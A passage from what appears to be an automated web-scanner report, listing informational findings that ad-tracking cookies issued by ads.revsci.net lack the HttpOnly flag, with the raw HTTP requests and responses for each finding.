oe0S8RslnhhySOuVM5idLnolA/QFAUSI5pXd1tlDD72wB9koAkjJWPUKeY33eeFkAWBQpIfoJAEfJiNKVq2Qd5wOORoDqK1np/WMNxWNZokGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GcpXhxh9CCs9YnWG+dWKnzNyBxrgIJBjBX3PhVDk1QsC03Vem3n9G4aK5lYQwB0igrRUIzMUcJJDyN8R725OilnRZ9tzO7iExbRQOmWqX6/mu0ROD8ZrIIc9xZIa2B2ogauEnlfGMynvUVzKeT/OVj/a3f7SpuFepHZk54HHUAV0L7jM7LPmEqRO9T7x6Li1pZW/pLlOjXX2mUfjTcUrsZVAvbD/H4N+SsJK+uDW/s44YejZsUOMJoVPGOQDuA2AflrD/McFWc+UX1OrMN/54pT13vLBmL/lqbyaefQLf85Nj/fK+WXTsMlmmEmarBG8cKviLscoTt0jVhHxz0+WvIHoOfpb4gc8J1BkQaXWIg5rpP4aAxjGv+KlAeoog0DHOyqEKNxjS0hebEQHc/qLxCBZUAvLH2iSQbXEU2F9DDeTrta8svKozVc312ryC4buT/M70irTlDi87j8J2N7nM+TRkjaaAkteNNCSxqWMDZFGGC5PIUnZqNzU6FpdFYzGhyFZCJ91zVZyA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=1238051&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:17:54 GMT

13.29. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3uZd="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElHUq9T0KhTQvGdZl0m4SM6PBI2cYY1w30LyShLbTioctb98V8hvaZFUEgQ5DhRY/E/JCbIHFQwt/grSnyppWDTrJOcjlnvDCzTjIS+HLK7AP9aTgqueQmu680lFkoEEFUMSxfdt5rD64CoLoa0l8uXk0UBMjmWdmqndyZIIYSJuCNnlYKnkyDMP4hkA0MaQmWO9gxSfPCOd+AzOLtzlbElceD/D8Mii+4oPmnpx1l4HmuKIcD5BS/Jw7rMbxTGDRxpWJgCRGEaf1Z1cNn6IGVP91tnkp8xY20+QPxtrt3nomYYv0V3kosvHVhxi0lus/2UGnLZOIF40Kw3Umya0xxySz9SfnlPMRhzaAxGbMACWoZhlo1JTnYe3VtMa8oqVHkhofo0V4U03xF3XB6CLCTPhABPIs91G227uOnv9N6Zfi03hE5l0KKhD2iwnh9ee35ozXo+wsZPgatQNjGXPcbmoEbkbyXglNJNZtZr30qOF4eo8kYhEXAjf4kCs1dejmFZcIloUB7bPWgbcQok2sWx6a6dCtzvq/HqM+CvPXeRvEx4Ayjgi8paZx56l/pdV4usKdvzutXLP5ej7JWbvM7wrzzQezNlsP5pJFr3BzoG9tkiF11WUrw0W0hGMpOAzI2GG+tgK0OE8jzGYJVA0D8p/Gk0s/4xwh+OxzgJzU2U99Ll5s/L0ZVWASL4QHw7oiH5LtrHUYUpUbg/ZandOZo4cg/cvfCZJpDpQewO/yniP7PYQTg4v9oKgcfd99rUWkPWFI68PhGMJSVkXvlyr24N85HgeaDcFWrZeGoS2t0U4WDlZTk6r9dmjClAazs+n9/SxRwEi4jTHwLyScZbszPvaXA2SobfJLQTTuNB86PipDofKUTjXgvqNPExI8NI4NA6QD6oPH9bn0ybOJrf/uDAFM275vtPfrZN80kIHSrFRZxfwQalSUmHL2jOnt1/8HIZ8NC2uLuGjJf/Xw2kEO//MpjA0ZmcsLQQQ5oiGwIiwg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQlg1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzxuinlkSQMJa8r7Hw923Xqgc42Y3a4wLoRcc/Reee1o5DgSioR5Ha0Nr4PHBocSb31KvwZUhYlVLOcHEQDp29fIqnLXvdRPOibpFPrADlIulnIGVnXcnFgp0efTRDENfaJtqIohrGCdPJKyjZdUl274FOZK+AuCPtZ4Or+SzJD1ArXy+EqGRKF0XukBt9J18V8lOtIm9a4adUA9qYpyPOq++JqjhxbOpg4rHoV/RHvOPvu8pghKEvd9081fCQnoscCPjgEI74l3wwsgNRHdzZB7kO2afXdKPzd7EtsFCYWBDUYJ3L6HkQleAoeuCoOuEUqGlEMVzspNKO+NYDbF47K9/oRFc6URqw572BJcOXwAxewBMKTEQdCFr9sKixzWK9gw/r7gdXFJ2WJO7gATmyWilGWysERBhnsybysB9LCAbZUjc6NMJXT36VKTXCduzKpHqWv+og5PYcTcjn2yvjzS84v0pN1EoO+x9fH8I6Oqf8tv3fmqzwd7zMxvzQbgDoO5vA9Qfpu0iZot8wH3PL7YwmU4863UnbzwJSo1QnREn5KuWo/CdmU8ldJZ8zXxtBO7civ97b+xtuApYw7WZiT14Mop1RwvMvd+pw254z5i5C+4PHCdkecis4keyl92Y1SpKqfJ1PzsiVwa24vHGh917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyAeFhZZBD5pnaLfuwzkq+Kl+wCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGesNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbh0tXHxtqBkzuZWP3y0CnqZ2kww2wr+Z+JovuWQ6Z8M1/r9DCXyrPTIVh9T9incB64/hhqfDL0QL0133AcR2XOJyAAA5vFdviFoFhWrT8fR9uOR9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar4aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjrHs7vc5GSpGvo22G6EjA1ba7jaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2cGptYUDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoWULa9Beykv3KI4ZlRj+7F9LQMTvAHxlTjJxHHZQNCGgU0O9s3uo2Kaf+OSSAwoDiaZq5IOttdfa8GnkzYnkGbX3l8xoAyhvsaxeRxx0Co1xB/0MOhTwjS8K9nbKGTmKXH3C4SGjEKIyid3Ig4zjJdrFT6/aOgAMd7uj2Q0dZvCEYhKm5TkjnIcf2fvpNAz1PoM4+2Fv0pTouczfJFHRN2xk8OMgUG/mZoIG+nwI4WrZc1iaeThHUVaCBiYpJDZurF4F1W/gbaAtU4pdxdK1DpFBZoWaQ2UeS7a+a9dmt4tztj1vIzpXbRO499E3A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:02:36 GMT

13.30. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2C